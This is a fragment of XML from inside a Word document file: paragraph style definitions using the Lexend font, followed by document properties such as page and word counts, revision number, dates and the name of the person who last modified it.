    <w:rsid w:val="00211B64"/>
    <w:rPr>
      <w:rFonts w:ascii="Lexend" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Lexend" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:aliases w:val="texr bthg"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00792F2C"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Lexend" w:hAnsi="Lexend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02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608B5-1621-4399-98F9-B64F024E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20</Pages>
  <Words>2868</Words>
  <Characters>16349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Trần Vũ Đăng Khoa</cp:lastModifiedBy>
  <cp:revision>204</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-08-28T02:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-14T10:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>